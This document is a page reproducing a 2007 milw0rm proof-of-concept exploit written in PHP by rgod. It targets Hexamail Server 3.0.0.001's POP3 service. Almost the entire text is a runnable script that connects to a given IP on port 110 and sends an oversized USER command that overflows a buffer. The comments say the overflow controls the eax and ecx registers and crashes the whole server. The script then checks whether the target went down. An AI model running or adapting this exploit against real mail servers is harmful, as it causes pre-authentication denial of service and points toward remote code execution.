Hexamail Server 3.0.0.001 pop3 preauth Remote Overflow PoC by h3m4n

VIEWS: 20 PAGES: 1

									                      Hexamail Server 3.0.0.001 pop3 preauth Remote Overflow PoC   Page 1/1
  1    <?php
  2    /*
  3
  4    Hexamail Server 3.0.0.001 (pop3) pre−auth remote overflow poc
  5
  6    by rgod
  7    http://retrogod.altervista.org
  8
  9    tested against the Lite one
  10   this one crashes the entire server
  11   you are in control of eax and ecx,
  12   I think arbitrary code execution is possible
  13   but a little tricky, see you soon ;)
  14
  15   vendor url: http://www.hexamail.com/hexamailserver/
  16
  17   */
  18
  19   error_reporting(0);
  20   if ($argc<2) {die("[!]Syntax: php $argv[0] [ip]\n");}
  21   echo "[*]Connecting to target host...\n";
  22   $fp=fsockopen($argv[1],110, $errno, $errstr, 5);
  23   if (!$fp) {die("[!]unable to connect ...");}
  24   else {echo "[*]connected...\n";}
  25   $eax="XXXX";
  26   $ecx="YYYY";
  27   $bof="./".str_repeat("A",15).$eax.$ecx.str_repeat("A",1025);
  28   $bof = "USER ".$bof."\r\n";
  29   fputs($fp,$bof);
  30   fgets($fp);
  31   fclose($fp);
  32   echo "[*]Sent.\n";
  33   sleep(2);
  34   $fp=fsockopen($argv[1],110, $errno, $errstr, 5);
  35   if (!$fp) {echo "[*]exploit succeeded...\n";}
  36   else {echo "[!]it seems not working...\n";}
  37   ?>
  38
  39   # milw0rm.com [2007−08−30]




rgod                                                                               08/30/2007

								
To top